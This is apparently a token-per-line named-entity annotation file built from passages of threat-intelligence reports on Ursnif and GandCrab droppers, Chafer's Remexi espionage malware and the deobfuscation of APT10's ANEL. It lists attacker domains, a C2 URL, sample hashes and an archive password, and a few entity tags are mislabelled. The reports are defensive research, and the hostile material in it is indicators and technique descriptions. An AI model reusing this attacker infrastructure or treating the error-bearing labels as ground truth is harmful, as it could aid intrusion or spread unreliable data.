bevendbrec.com S-DOM
site O
during O
this O
campaign O
. O

Carbon B-SECTEAM
Black E-SECTEAM
was O
able O
to O
discover O
approximately O
120 O
different O
Ursnif S-MAL
variants O
that O
were O
being O
hosted O
from O
the O
domains O
iscondisth.com S-DOM
and O
bevendbrec.com S-DOM
. O
irongreen.exe S-FILE
: O
404d25e3a18bda19a238f77270837198 S-MD5
c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f S-SHA2
, O
Sun B-TIME
Dec I-TIME
18 I-TIME
11:04:31 I-TIME
2011 E-TIME
UTC O
. O
irongreen.text S-FILE
: O
85aa9117c381eae3d181ab63daab335e S-MD5
. O
irongreen.rdata S-FILE
: O
3e1c774bc4e0ffc2271075e621aa3f3d S-MD5
. O
irongreen.data S-FILE
: O
6c389e5e301564f65dcad4811dbded8b S-MD5
. O
irongreen.rsrc S-FILE
: O
efba623cc62ffd0ccbf7f3fbf6264905 S-MD5
. O
irongreen.reloc S-FILE
: O
6cf46599a57a6cbc5d18fbb2883620ce S-MD5
. O

While O
researching O
this O
campaign O
approximately O
180 O
variants O
were O
located O
in O
the O
wild O
. O

Using O
the O
VirusTotal B-TOOL
Graph E-TOOL
functionality O
these O
variants O
could O
be O
organized O
into O
several O
groups O
that O
were O
commonly O
associated O
by O
either O
metadata O
or O
document O
structures O
like O
macros O
or O
embedded O
image O
files O
( O
depicted O
in O
the O
image O
below O
) O
. O

The O
image O
below O
highlights O
the O
nodes O
associated O
with O
the O
samples O
analyzed O
in O
this O
report O
. O

The O
graph O
can O
also O
be O
viewed O
in O
the O
VTGraph B-TOOL
Console E-TOOL
for O
additional O
exploration O
. O

The O
graph O
highlights O
the O
at O
least O
3 O
different O
variants O
of O
Ursnif S-MAL
that O
were O
being O
hosted O
on O
the O
bevendbrec.com S-DOM
site O
. O

The O
Ursnif S-MAL
variants O
were O
primarily O
grouped O
by O
C2 S-TOOL
infrastructure O
. O

The O
large O
grouping O
on O
the O
right O
of O
the O
diagram O
are O
direct O
variants O
of O
the O
sample O
referenced O
in O
this O
write O
up O
. O

Samples O
in O
this O
grouping O
were O
all O
hosted O
on O
sites O
that O
were O
called O
by O
the O
second O
stage O
. O

The O
samples O
had O
minor O
changes O
, O
and O
were O
presumably O
changed O
by O
the O
attackers O
to O
avoid O
detection O
by O
hash O
. O

Word B-MAL
Dropper E-MAL
Variant O
cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 S-SHA2
7ce3d9fc86396fac9865607594395e94 S-MD5
Word B-MAL
Dropper E-MAL
Variant O
28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 S-SHA2
74c7aed44680100e984251ce2cdbdbc6 S-MD5
Word B-MAL
Dropper E-MAL
Variant O
facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 S-SHA2
10f308d78adda567d4589803ce18cc9b S-MD5
Word B-MAL
Dropper E-MAL
Variant O
e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 S-SHA2
f279d0f04874327b85221697d99de321 S-MD5
Word B-MAL
Dropper E-MAL
Variant O
56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d S-SHA2
bc1b322e7efc19417ab0d0524ccb9ff2 S-MD5
. O

Ursnif S-MAL
Variant O
446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 S-SHA2
ea7e1650031c92b7377788f05926034e S-MD5
Ursnif S-MAL
Variant O
42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d S-SHA2
377cd85d8d68fc58976a123aa151c5e0 S-MD5
Ursnif S-MAL
Variant O
24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 S-SHA2
b73cbffea8094cfa18b067d9568c53e7 S-MD5
Ursnif S-MAL
Variant O
e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 S-SHA2
24fe5a6196e32749cd030ab51824cabe S-MD5
Ursnif S-MAL
Variant O
4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de S-SHA2
589734cb60aa515599c687539c520049 S-MD5
. O

GandCrab S-MAL
Variant O
d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2
ce1ee671fe5246a9c40b624ef97e4de1 S-MD5
GandCrab S-MAL
Variant O
aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 S-SHA2
07f955796a252771861c8e0db06b1f01 S-MD5
GandCrab S-MAL
Variant O
8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec S-SHA2
4fcd0d13ea669a83a749ae5bfb098ca2 S-MD5
GandCrab S-MAL
Variant O
933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 S-SHA2
8ec87fd3ea777fa8d5160dc957e6683e S-MD5
GandCrab S-MAL
Variant O
e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 S-SHA2
c7d5077960882259b85c01fd41c49ffd S-MD5
. O


Chafer S-APT
used O
Remexi S-MAL
malware O
to O
spy O
on O
Iran-based O
foreign O
diplomatic O
entities O
Throughout O
the O
autumn O
of O
2018 O
we O
analyzed O
a O
long-standing O
(and O
still O
active O
at O
that O
time) O
cyber-espionage O
campaign O
that O
was O
primarily O
targeting O
foreign O
diplomatic O
entities O
based O
in O
Iran S-LOC
. O

The O
attackers O
were O
using O
an O
improved O
version O
of O
Remexi S-MAL
in O
what O
the O
victimology O
suggests O
might O
be O
a O
domestic O
cyber-espionage O
operation
. O

This O
malware O
has O
previously O
been O
associated O
with O
an O
APT O
actor O
that O
Symantec S-IDTY
calls O
Chafer S-APT
. O

The O
malware O
can O
exfiltrate O
keystrokes, O
screenshots, O
browser-related O
data O
like O
cookies O
and O
history, O
decrypted O
when O
possible
. O

The O
attackers O
rely O
heavily O
on O
Microsoft S-IDTY
technologies O
on O
both O
the O
client O
and O
server O
sides: O
the O
Trojan S-TOOL
uses O
standard O
Windows S-OS
utilities O
like O
Microsoft B-TOOL
Background I-TOOL
Intelligent I-TOOL
Transfer I-TOOL
Service E-TOOL
(BITS S-TOOL
) O
bitsadmin.exe S-FILE
to O
receive O
commands O
and O
exfiltrate O
data
. O

Its O
C2 S-TOOL
is O
based O
on O
IIS S-TOOL
using O
.asp S-FILE
technology O
to O
handle O
the O
victims’ O
HTTP O
requests
. O

Remexi S-MAL
developers O
use O
the O
C S-TOOL
programming O
language O
and O
GCC S-TOOL
compiler O
on O
Windows S-OS
in O
the O
MinGW S-TOOL
environment
. O

They O
most O
likely O
used O
the O
Qt B-TOOL
Creator I-TOOL
IDE E-TOOL
in O
a O
Windows S-OS
environment
. O

The O
malware O
utilizes O
several O
persistence O
mechanisms O
including O
scheduled O
tasks, O
Userinit O
and O
Run O
registry O
keys O
in O
the O
HKLM S-TOOL
hive
. O

XOR S-ENCR
and O
RC4 S-ENCR
encryption O
is O
used O
with O
quite O
long O
unique O
keys O
for O
different O
samples
. O

Among O
all O
these O
random O
keys O
once O
the O
word O
“salamati” O
was O
also O
used, O
which O
means O
“health” O
in O
Farsi S-LOC
. O

Kaspersky B-SECTEAM
Lab E-SECTEAM
products O
detect O
the O
malware O
described O
in O
this O
report O
as O
Trojan.Win32.Remexi S-FILE
and O
Trojan.Win32.Agent S-FILE
. O

This O
blogpost O
is O
based O
in O
our O
original O
report O
shared O
with O
our O
APT O
Intelligence O
Reporting O
customers O
last B-TIME
November I-TIME
2018 E-TIME
. O

The O
main O
tool O
used O
in O
this O
campaign O
is O
an O
updated O
version O
of O
the O
Remexi S-MAL
malware, O
publicly O
reported O
by O
Symantec S-IDTY
back O
in O
2015 S-TIME
. O

The O
newest O
module’s O
compilation O
timestamp O
is O
March B-TIME
2018 E-TIME
. O

The O
developers O
used O
GCC S-TOOL
compiler O
on O
Windows S-OS
in O
the O
MinGW S-TOOL
environment
. O

Inside O
the O
binaries O
the O
compiler O
left O
references O
to O
the O
names O
of O
the O
C S-TOOL
source O
file O
modules O
used: O
operation_reg.c S-FILE
, O
thread_command.c S-FILE
and O
thread_upload.c S-FILE
. O

Like O
mentioned O
in O
modules O
file O
names O
the O
malware O
consists O
of O
several O
working O
threads O
dedicated O
to O
different O
tasks, O
including O
C2 S-TOOL
command O
parsing O
and O
data O
exfiltration
. O

For O
both O
the O
receiving O
of O
C2 S-TOOL
commands O
and O
exfiltration, O
Remexi S-MAL
uses O
the O
Microsoft B-TOOL
Background I-TOOL
Intelligent I-TOOL
Transfer I-TOOL
Service E-TOOL
(BITS S-TOOL
) O
mechanism O
to O
communicate O
with O
the O
C2 S-TOOL
over O
HTTP
. O

So O
far, O
our O
telemetry O
hasn’t O
provided O
any O
concrete O
evidence O
that O
shows O
us O
how O
the O
Remexi S-MAL
malware O
spread
. O

However, O
we O
think O
it’s O
worth O
mentioning O
that O
for O
one O
victim O
we O
found O
a O
correlation O
between O
the O
execution O
of O
Remexi´s O
main O
module O
and O
the O
execution O
of O
an O
AutoIt S-TOOL
script O
compiled O
as O
PE S-TOOL
, O
which O
we O
believe O
may O
have O
dropped O
the O
malware
. O

This O
dropper O
used O
an O
FTP O
with O
hardcoded O
credentials O
to O
receive O
its O
payload
. O

FTP O
server O
was O
not O
accessible O
any O
more O
at O
the O
time O
of O
our O
analysis
. O

Remexi S-MAL
boasts O
features O
that O
allow O
it O
to O
gather O
keystrokes, O
take O
screenshots O
of O
Windows S-OS
of O
interest O
(as O
defined O
in O
its O
configuration), O
steal O
credentials, O
logons O
and O
the O
browser O
history, O
and O
execute O
remote O
commands
. O

Encryption O
consists O
of O
XOR S-ENCR
with O
a O
hardcoded O
key O
for O
its O
configuration O
and O
RC4 S-ENCR
with O
a O
predefined O
password O
for O
encrypting O
the O
victim’s O
data
. O

Remexi S-MAL
includes O
different O
modules O
that O
it O
deploys O
in O
its O
working O
directory, O
including O
configuration O
decryption O
and O
parsing, O
launching O
victim O
activity O
logging O
in O
a O
separate O
module, O
and O
seven O
threads O
for O
various O
espionage O
and O
auxiliary O
functions
. O

The O
Remexi O
developers O
seem O
to O
rely O
on O
legitimate O
Microsoft S-IDTY
utilities, O
which O
we O
enumerate O
in O
the O
table O
below： O
extract.exe S-FILE
Deploys O
modules O
from O
the O
.cab S-FILE
file O
into O
the O
working O
Event O
Cache O
directory, O
bitsadmin.exe S-FILE
Fetches O
files O
from O
the O
C2 S-TOOL
server O
to O
parse O
and O
execute O
commands
. O

Send O
exfiltrated O
data, O
taskkill.exe S-FILE
Ends O
working O
cycle O
of O
modules
. O

Persistence O
modules O
are O
based O
on O
scheduled O
tasks O
and O
system O
registry
. O

Mechanisms O
vary O
for O
different O
OS O
versions
. O

In O
the O
case O
of O
old O
Windows S-OS
versions O
like O
XP S-OS
, O
main O
module O
events.exe S-FILE
runs O
an O
edited O
XPTask.vbs S-FILE
Microsoft S-IDTY
sample O
script O
to O
create O
a O
weekly O
scheduled O
task O
for O
itself
. O

For O
newer O
operating O
systems, O
events.exe S-FILE
creates O
task.xml S-FILE
. O

To O
decrypt O
the O
configuration O
data, O
the O
malware O
uses O
XOR S-ENCR
with O
25-character O
keys O
such O
as O
“waEHleblxiQjoxFJQaIMLdHKz” O
that O
are O
different O
for O
every O
sample
. O

RC4 S-ENCR
file O
encryption O
relies O
on O
the O
Windows S-OS
32 O
CryptoAPI S-TOOL
, O
using O
the O
provided O
value’s O
MD5 S-ENCR
hash O
as O
an O
initial O
vector
. O

Among O
all O
these O
random O
keys O
once O
the O
word O
“salamati” O
was O
also O
used, O
which O
means O
“health” O
in O
Farsi
. O

Config.ini S-FILE
is O
the O
file O
where O
the O
malware O
stores O
its O
encrypted O
configuration O
data.List O
of O
files O
to O
send O
to O
C2 S-TOOL
using O
bitsadmin.exe S-FILE
from O
the O
dedicated O
thread: O
upLog.txt S-FILE
, O
upSCRLog.txt S-FILE
, O
upSpecial.txt S-FILE
, O
upFile.txt S-FILE
, O
upMSLog.txt S-FILE
. O
http://108.61.189.174 S-URL
control O
server O
HTTP S-PROT
URL
. O

KtJvOXulgibfiHk O
is O
the O
password O
for O
uploaded O
zip O
archives
. O

One O
of O
the O
malware O
threads O
checks O
in O
an O
infinite O
loop O
if O
the O
mouse O
button O
was O
pressed O
and O
then O
also O
increments O
the O
integer O
iterator O
infinitely
. O

If O
the O
mouse O
hooking O
function O
registers O
a O
button O
hit, O
it O
lets O
the O
screenshotting O
thread O
know O
about O
it O
through O
a O
global O
variable
. O

After O
that, O
it O
checks O
if O
the O
iterator O
divided O
by O
(captureScreenTimeOut/captureActiveWindowTimeOut) O
has O
a O
remainder O
of O
0
. O

In O
that O
case, O
it O
takes O
a O
screenshot
. O

events.exe S-FILE
: O
b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 S-SHA2
, O
c981273c32b581de824e1fd66a19a281 S-MD5
, O
GCC S-TOOL
compiler O
in O
MinGW S-TOOL
environment O
version O
2.24, O
I386 O
Windows S-OS
GUI S-TOOL
EXE S-TOOL
. O

After O
checking O
that O
the O
malware O
is O
not O
already O
installed O
, O
it O
unpacks O
HCK.cab S-FILE
using O
the O
Microsoft S-IDTY
standard O
utility O
expand.exe S-FILE
. O

Splitter.exe S-FILE
: O
a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff S-SHA2
, O
1ff40e79d673461cd33bd8b68f8bb5b8 S-MD5
, O
2017.08.06 B-TIME
11:32:36 E-TIME
(GMT), O
I386 O
Windows S-OS
Console S-TOOL
EXE S-TOOL
. O

Exfiltration S-ACT
is O
done O
through O
the O
bitsadmin.exe S-FILE
utility
. O

The O
BITS S-TOOL
mechanism O
has O
existed O
since O
Windows B-OS
XP E-OS
up O
to O
the O
current O
Windows B-OS
10 E-OS
versions O
and O
was O
developed O
to O
create O
download/upload O
jobs, O
mostly O
to O
update O
the O
OS O
itself
. O

The O
vast O
majority O
of O
the O
users O
targeted O
by O
this O
new O
variant O
of O
Remexi S-MAL
appear O
to O
have O
Iranian S-LOC
IP O
addresses
. O

Some O
of O
these O
appear O
to O
be O
foreign O
diplomatic O
entities O
based O
in O
the O
country
. O

The O
Remexi S-MAL
malware O
has O
been O
associated O
with O
an O
APT O
actor O
called O
Chafer S-APT
by O
Symantec S-IDTY
. O

One O
of O
the O
human-readable O
encryption O
keys O
used O
is O
“salamati”
. O

This O
is O
probably O
the O
Latin O
spelling O
for O
the O
word O
“health” O
in O
Farsi S-LOC
. O

Among O
the O
artifacts O
related O
to O
malware O
authors, O
we O
found O
in O
the O
binaries O
a O
.pdb S-FILE
path O
containing O
the O
Windows S-OS
user O
name O
“Mohamadreza O
New”
. O

Interestingly, O
the O
FBI S-IDTY
website O
for O
wanted O
cybercriminals O
includes O
two O
Iranians O
called O
Mohammad O
Reza, O
although O
this O
could O
be O
a O
common O
name O
or O
even O
a O
false O
flag
. O

Activity O
of O
the O
Chafer S-APT
APT O
group O
has O
been O
observed O
since O
at O
least O
2015 S-TIME
, O
but O
based O
on O
things O
like O
compilation O
timestamps O
and O
C&C O
registration, O
it’s O
possible O
they O
have O
been O
active O
for O
even O
longer
. O


Defeating O
Compiler-Level O
Obfuscations O
Used O
in O
APT10 S-APT
Malware O
. O

The B-SECTEAM
Carbon I-SECTEAM
Black I-SECTEAM
Threat I-SECTEAM
Analysis I-SECTEAM
Unit E-SECTEAM
( O
TAU S-SECTEAM
) O

recently O
analyzed O
a O
series O
of O
malware O
samples O
that O
utilized O
compiler-level O
obfuscations O
. O

For O
example O
, O

opaque O
predicates O
were O
applied O
to O
Turla S-APT
mosquito S-MAL
and O
APT10 S-APT
ANEL S-MAL
. O

Another O
obfuscation O
, O

control O
flow O
flattening O
, O

was O
applied O
to O
APT10 S-APT
ANEL S-MAL
and O
Dharma S-MAL
ransomware O
packer O
. O

ANEL S-MAL
( O
also O
referred O
to O
as O
UpperCut S-MAL
) O

is O
a O
RAT O
program O
used O
by O
APT10 S-APT
and O
observed O
in O
Japan S-LOC
uniquely O
. O

According O
to O
SecureWorks S-SECTEAM
, O

all O
ANEL S-MAL
samples O
whose O
version O
is O
5.3.0 O
or O
later O
are O
obfuscated O
with O
opaque O
predicates O
and O
control O
flow O
flattening O
. O

Opaque O
predicate O
is O
a O
programming O
term O
that O
refers O
to O
decision O
making O
where O
there O
is O
actually O
only O
one O
path O
. O

For O
example O
, O

this O
can O
be O
seen O
as O
calculating O
a O
value O
that O
will O
always O
return O
True O
. O

Control O
flow O
flattening O
is O
an O
obfuscation O
method O
where O
programs O
do O
not O
cleanly O
flow O
from O
beginning O
to O
end O
. O

Instead O
, O

a O
switch O
statement O
is O
called O
in O
an O
infinite O
loop O
having O
multiple O
code O
blocks O
each O
performing O
operations O
. O

The O
obfuscations O
looked O
similar O
to O
the O
ones O
explained O
in O
Hex-Rays O
blog O
, O

but O
the O
introduced O
IDA B-TOOL
Pro E-TOOL
plugin O
HexRaysDeob S-TOOL
didn’t O
work O
for O
one O
of O
the O
obfuscated O
ANEL S-MAL
samples O
because O
the O
tool O
was O
made O
for O
another O
variant O
of O
the O
obfuscation O
. O

TAU S-SECTEAM
investigated O
the O
ANEL S-MAL
obfuscation O
algorithms O
then O
modified O
the O
HexRaysDeob S-TOOL
code O
to O
defeat O
the O
obfuscations O
. O

After O
the O
modification O
, O

TAU S-SECTEAM
was O
able O
to O
recover O
the O
original O
code O
. O

HexRaysDeob S-TOOL
is O
an O
IDA B-TOOL
Pro E-TOOL
plugin O
written O
by O
Rolf O
Rolles O
to O
address O
obfuscation O
seen O
in O
binaries O
. O

In O
order O
to O
perform O
the O
deobfuscation O
, O

the O
plugin O
manipulates O
the O
IDA O
intermediate O
language O
called O
microcode O
. O

If O
you O
aren’t O
familiar O
with O
those O
structures O
( O
e.g O
, O

microcode O
data O
structures O
, O

maturity O
level O
, O

Microcode B-TOOL
Explorer E-TOOL
and O
so O
on O
) O

, O

you O
should O
read O
his O
blog O
post O
. O

Rolles O
also O
provides O
an O
overview O
of O
each O
obfuscation O
technique O
in O
the O
same O
post O
. O

HexRaysDeob S-TOOL
installs O
two O
callbacks O
when O
loading O
: O

optinsn_t S-TOOL
for O
defeating O
opaque O
predicates O
( O
defined O
as O
ObfCompilerOptimizer S-TOOL
) O


optblock_t S-TOOL
for O
defeating O
control O
flow O
flattening O
( O
defined O
as O
CFUnflattener S-TIME
) O

. O

Before O
continuing O
, O

it O
is O
important O
to O
understand O
Hex-Rays S-TOOL
maturity O
levels O
. O

When O
a O
binary O
is O
loaded O
into O
IDA B-TOOL
Pro E-TOOL
, O

the O
application O
will O
perform O
distinct O
layers O
of O
code O
analysis O
and O
optimization O
, O

referred O
to O
as O
maturity O
levels O
. O

One O
layer O
will O
detect O
shellcode O
, O

another O
optimizes O
it O
into O
blocks O
, O

another O
determines O
global O
variables O
, O

and O
so O
forth O
. O

The O
optinsn_t B-TOOL
: I-TOOL
:f I-TOOL
unc E-TOOL
callback O
function O
is O
called O
in O
maturity O
levels O
from O
MMAT_ZERO S-TOOL
( O
microcode O
does O
not O
exist O
) O

to O
MMAT_GLBOPT2 S-TOOL
( O
most O
global O
optimizations O
completed O
) O

. O

During O
the O
callback O
, O

opaque O
predicates O
pattern O
matching O
functions O
are O
called O
. O

If O
the O
code O
pattern O
is O
matched O
with O
the O
definitions O
, O

it O
is O
replaced O
with O
another O
expression O
for O
the O
deobfuscation O
. O

This O
is O
important O
to O
perform O
in O
each O
maturity O
level O
as O
the O
obfuscated O
code O
could O
be O
modified O
or O
removed O
as O
the O
code O
becomes O
more O
optimized O
. O

We O
defined O
two O
patterns O
for O
analysis O
of O
the O
ANEL S-MAL
sample O
. O

The O
global O
variable O
value O
dword_745BB58C O
is O
either O
even O
or O
odd O
, O

so O
dword_745BB58C O
* O
( O
dword_745BB58C O
– O
1 O
) O

is O
always O
even O
. O

This O
results O
in O

the O
lowest O
bit O
of O
the O
negated O
value O
becoming O
1 O
. O

Thus O
, O

OR O
by O
-2 O
( O
0xFFFFFFFE O
) O

will O
always O
produce O
the O
value O
-1 O
. O

In O
this O
case O
, O

the O
pattern O
matching O
function O
replaces O
dword_745BB58C O
* O
( O
dword_745BB58C O
– O
1 O
) O

with O
2 O
. O

The O
global O
variable O
value O
dword_72DBB588 O
is O
always O
0 O
because O
the O
value O
is O
not O
initialized O
( O
we O
can O
check O
it O
by O
is_loaded B-TOOL
API E-TOOL
) O

and O
has O
only O
read O
accesses O
. O

So O
the O
pattern O
matching O
function O
replaces O
the O
global O
variable O
with O
0 O
. O

There O
are O
some O
variants O
with O
this O
pattern O
( O
e.g O
, O
the O
variable O
– O
10 O
< O
0 O
) O

, O

where O
the O
immediate O
constant O
can O
be O
different O
. O

We O
also O
observed O
a O
pattern O
that O
was O
also O
using O
an O
8-bit O
portion O
of O
the O
register O
. O

In O
the O
following O
example O
, O

the O
variable O
v5 O
in O
pseudocode O
is O
a O
register O
operand O
( O
cl O
) O

in O
microcode O
. O

We O
need O
to O
check O
if O
the O
value O
comes O
from O
the O
result O
of O
x O
* O
( O
x O
– O
1 O
) O

. O

In O
another O
example O
, O

the O
variable O
v2 O
in O
pseudocode O
is O
a O
register O
operand O
( O
ecx O
) O

in O
microcode O
. O

We O
have O
to O
validate O
if O
a O
global O
variable O
with O
above-mentioned O
conditions O
is O
assigned O
to O
the O
register O
. O

Data-flow O
tracking O
code O
was O
added O
to O
detect O
these O
use-cases O
. O

The O
added O
code O
requires O
that O
the O
mblock_t S-TOOL
pointer O
information O
is O
passed O
from O
the O
argument O
of O
optinsn_t B-TOOL
: I-TOOL
:f I-TOOL
unc E-TOOL
to O
trace O
back O
previous O
instructions O
using O
the O
mblock_t S-TOOL
linked O
list O
. O

However O
, O

the O
callback O
returns O
NULL O
from O
the O
mblock_t S-TOOL
pointer O
if O
the O
instruction O
is O
not O
a O
top-level O
one O
. O

If O
the O
setl O
is O
always O
sub-instruction O
during O
the O
optimization O
, O

we O
never O
get O
the O
pointer O
. O

To O
handle O
this O
type O
of O
scenario O
, O

the O
code O
was O
modified O
to O
catch O
and O
pass O
the O
mblock_t S-TOOL
of O
the O
jnz O
instruction O
to O
the O
sub-instruction O
. O

The O
original O
implementation O
calls O
the O
optblock_t B-TOOL
: I-TOOL
:f I-TOOL
unc E-TOOL
callback O
function O
in O
MMAT_LOCOPT S-TOOL
( O
local O
optimization O
and O
graphing O
are O
complete O
) O

maturity O
level O
. O

Rolles O
previously O
explained O
the O
unflattening O
algorithm O
in O
a O
Hex-Rays S-TOOL
blog O
. O

For O
brevity O
I O
will O
quickly O
cover O
some O
key O
points O
to O
understand O
the O
algorithm O
at O
a O
high O
level O
. O

Normally O
the O
call O
flow O
graph O
( O
CFG O
) O

of O
a O
function O
obfuscated O
with O
control O
flow O
flattening O
has O
a O
loop O
structure O
starting O
with O
yellow-colored O
“ O
control O
flow O
dispatcher O
” O

like O
this O
, O

shown O
after O
the O
First O
Block O
. O

The O
original O
code O
is O
separated O
into O
the O
orange-colored O
“ O
first O
block O
” O

and O
green-colored O
flattened O
blocks O
. O

The O
analyst O
is O
then O
required O
to O
resolve O
the O
correct O
next O
block O
and O
modify O
the O
destination O
accordingly O
. O

The O
next O
portion O
of O
first O
block O
and O
each O
flattened O
block O
is O
decided O
by O
a O
“ O
block O
comparison O
variable O
” O

with O
an O
immediate O
value O
. O

The O
value O
of O
the O
variable O
is O
assigned O
to O
a O
specific O
register O
in O
each O
block O
then O
compared O
in O
a O
control O
flow O
dispatcher O
and O
other O
condition O
blocks O
. O

If O
the O
variable O
registers O
for O
the O
comparison O
and O
assignment O
are O
different O
, O

the O
assignment O
variable O
is O
called O
“ O
block O
update O
variable O
” O

( O
which O
is O
further O
explained O
later O
) O

. O

The O
algorithm O
looks O
straightforward O
however O
some O
portions O
of O
the O
code O
had O
to O
be O
modified O
in O
order O
to O
correctly O
deobfuscate O
the O
code O
. O

This O
is O
further O
detailed O
below O
. O

As O
previously O
detailed O
, O

the O
original O
implementation O
of O
the O
code O
only O
works O
in O
MMAT_LOCOPT S-TOOL
maturity O
level O
. O

Rolles O
said O
this O
was O
to O
handle O
another O
obfuscation O
called O
“ O
Odd O
Stack O
Manipulations O
” O

, O

referred O
in O
his O
blog O
) O

. O

However O
the O
unflattening O
of O
ANEL S-MAL
code O
had O
to O
be O
performed O
in O
the O
later O
maturity O
level O
since O
the O
assignment O
of O
block O
comparison O
variable O
heavily O
depends O
on O
opaque O
predicates O
. O

As O
an O
example O
in O
the O
following O
obfuscated O
function O
, O

the O
v3 O
and O
v7 O
variables O
are O
assigned O
to O
the O
block O
comparison O
variable O
( O
b_cmp O
) O

. O

However O
the O
values O
are O
dependent O
on O
opaque O
predicates O
results O
. O

Once O
the O
opaque O
predicates O
are O
broken O
, O

the O
loop O
code O
becomes O
simpler O
. O

Unflattening O
the O
code O
in O
later O
maturity O
levels O
like O
MMAT_GLBOPT1 S-TOOL
and O
MMAT_GLBOPT2 S-TOOL
( O
first O
and O
second O
pass O
of O
global O
optimization O
) O

caused O
additional O
problems O
. O

The O
unflattening O
algorithm O
requires O
mapping O
information O
between O
block O
comparison O
variable O
and O
the O
actual O
block O
number O
( O
mblock_t B-TOOL
: I-TOOL
:s I-TOOL
erial E-TOOL
) O

used O
in O
the O
microcode O
. O

In O
later O
maturity O
levels O
, O

some O
blocks O
are O
deleted O
by O
the O
optimization O
after O
defeating O
opaque O
predicates O
, O

which O
removes O
the O
mapping O
information O
. O

In O
the O
example O
below O
, O

the O
blue-highlighted O
immediate O
value O
0x4624F47C O
is O
assigned O
to O
block O
comparison O
variable O
in O
the O
first O
block O
. O

The O
mapping O
can O
be O
created O
by O
checking O
the O
conditional O
jump O
instruction O
( O
jnz O
) O

in O
MMAT_LOCOPT S-TOOL
. O

Additionally O
here O
is O
no O
mapping O
information O
in O
MMAT_GLBOPT2 S-TOOL
because O
the O
condition O
block O
that O
contains O
the O
variable O
has O
been O
deleted O
. O

So O
the O
next O
block O
of O
the O
first O
one O
in O
the O
level O
can O
not O
be O
determined O
. O

To O
resolve O
that O
issue O
, O

the O
code O
was O
written O
to O
link O
the O
block O
comparison O
variable O
and O
block O
address O
in O
MMAT_LOCOPT S-TOOL
, O

as O
the O
block O
number O
is O
changed O
in O
each O
maturity O
level O
. O

If O
the O
code O
can’t O
determine O
the O
mapping O
in O
later O
maturity O
levels O
, O

it O
attempts O
to O
guess O
the O
next O
block O
number O
based O
on O
the O
address O
, O

considering O
each O
block O
and O
instruction O
addresses O
. O

The O
guessing O
is O
not O
100% O
accurate O
however O
it O
works O
for O
the O
majority O
of O
obfuscated O
functions O
tested O
. O

Though O
the O
original O
implementation O
assumes O
an O
obfuscated O
function O
has O
only O
one O
control O
flow O
dispatcher O
, O

some O
functions O
in O
the O
ANEL O
sample O
have O
multiple O
control O
dispatchers O
. O

Originally O
the O
code O
called O
the O
optblock_t B-TOOL
: I-TOOL
:f I-TOOL
unc E-TOOL
callback O
in O
MMAT_GLBOPT1 S-TOOL
and O
MMAT_GLBOPT2 S-TOOL
, O

as O
the O
result O
was O
not O
correct O
in O
MMAT_CALLS S-TOOL
( O
detecting O
call O
arguments O
) O

. O

However O
, O

this O
did O
not O
work O
for O
functions O
with O
three O
or O
more O
dispatchers O
. O

Additionally O
, O

Hex-Rays S-TOOL
kernel O
doesn’t O
optimize O
some O
functions O
in O
MMAT_GLBOPT2 S-TOOL
if O
it O
judges O
the O
optimization O
within O
the O
level O
is O
not O
required O
. O

In O
this O
case O
, O

the O
callback O
is O
executed O
just O
once O
in O
the O
implementation O
. O

To O
handle O
multiple O
control O
flow O
dispatchers O
, O

a O
callback O
for O
decompiler O
events O
was O
implemented O
. O

The O
code O
catches O
the O
“ O
hxe_prealloc O
” O

event O
( O
according O
to O
Hex-Rays S-TOOL
, O

this O
is O
the O
final O
event O
for O
optimizations O
) O

then O
calls B-TOOL
optblock_t I-TOOL
: I-TOOL
:f I-TOOL
unc E-TOOL
callback O
. O

Typically O
this O
event O
occurs O
a O
few O
times O
to O
several O
times O
, O

so O
the O
callback O
can O
deobfuscate O
multiple O
control O
flow O
flattenings O
. O

Other O
additional O
modifications O
were O
made O
to O
the O
code O
( O
e.g O
, O
writing O
a O
new O
algorithm O
for O
finding O
control O
flow O
dispatcher O
and O
first O
block O
, O

validating O
a O
block O
comparison O
variable O
, O

and O
so O
on O
) O

. O

After O
the O
modification O
, O

for O
example O
, O

the O
following O
functions O
with O
multiple O
control O
flow O
dispatchers O
can O
be O
unflattened O
. O

The O
original O
implementation O
supports O
the O
following O
two O
cases O
of O
flattened O
blocks O
to O
find O
a O
block O
comparison O
variable O
for O
the O
next O
block O
( O
the O
cases O
are O
then O
simplified O
) O

. O

In O
the O
second O
case O
, O

block O
comparison O
variable O
is O
searched O
in O
each O
block O
of O
endsWithJcc S-TOOL
and O
nonJcc S-TOOL
. O

If O
the O
next O
block O
is O
resolved O
, O

the O
CFG O
( O
specifically O
mblock_t B-TOOL
: I-TOOL
:p I-TOOL
redset E-TOOL
and O
mblock_t B-TOOL
: I-TOOL
:s I-TOOL
uccset E-TOOL
) O

and O
the O
destination O
of O
goto O
jump O
instruction O
are O
updated O
. O

The O
code O
tracks O
the O
block O
comparison O
variable O
in O
each O
predecessor O
and O
more O
( O
if O
any O
conditional O
blocks O
before O
the O
predecessor O
) O

to O
identify O
each O
next O
block O
for O
unflattening O
. O

And O
, O

in O
the O
third O
case O
that O
was O
implemented O
, O

the O
block O
comparison O
variables O
are O
not O
assigned O
in O
the O
flattened O
blocks O
but O
rather O
the O
first O
blocks O
according O
to O
a O
condition O
. O

For O
